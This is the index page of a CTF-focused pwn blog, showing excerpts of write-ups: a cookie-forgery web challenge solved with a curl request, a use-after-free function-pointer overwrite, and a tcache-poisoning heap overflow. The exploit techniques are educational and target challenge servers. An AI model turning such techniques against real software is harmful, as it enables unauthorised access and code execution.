Hi, I’m yu. I mainly write blogs related to pwn / Binary exploitation and what I learned stuff.

Journal of GCC2023 in Singapore

First of All In Preparation…

2023-02-24 · 1 min · Me


Challenges [web]secure-page ... if admin == '': headers['set-cookie'] = 'admin=false' if admin == 'true': return (200, ''' <title>Secure Page</title> <link rel="stylesheet" href="/style.css" /> <div class="container"> <h1>Secure Page</h1> %s</div> ''' % os.environ.get('FLAG', 'flag is missing!'), headers) ... Just set Cookie: admin=true in the Header and send request. curl -H 'Cookie: admin=true' https://secure-page.mc.ax hope{signatures_signatures_signatures} [web]reverser Template Injection is likely to occur at the following. @app.post('/') def reverse(): ....

2022-07-25 · 4 min · Me

uaf4b - CakeCTF2021

Plan Overwrite the function pointer with system function by Use After Free. About CAWSAY struct In freed chunk, fn_dialogue is assigned to fd and message is assigned to bk. typedef struct { void (*fn_dialogue)(char*); char *message; } COWSAY; Also, you pay attention to execute cowsay->fn_dialogue(cowsay->message); in L167~171 in main.c. case 1: /* Use cowsay */ printf("[+] You're trying to call 0x%016lx\n", (addr)cow say->fn_dialogue); cowsay->fn_dialogue(cowsay->message); break; malloced chunk When it malloced, Heap area is following....

2022-05-10 · 1 min · Me

Beginner's Heap - SECCON Beginner's CTF 2020

Plan Overwrite under chunk’s fd pointer by Heap Overflow, and then call win function by tcache poisoning. Preparation Malloced and then, it connects area freed of B to tcache. -=-=-=-=-= TCACHE -=-=-=-=-= [ tcache (for 0x20) ] || \/ [ 0x000055dfd3002350(rw-) ] || \/ [ END OF TCACHE ] -=-=-=-=-=-=-=-=-=-=-=-=-=-= Vulnerability Vulnerability is Heap Overflow. You can write 0x80 byte to a chunk for 0x18. Overwrite B’s fd pointer Now, there isn’t a freed chunk which connects to the next because the freed chunk’s fd is NULL....

2022-05-06 · 2 min · Me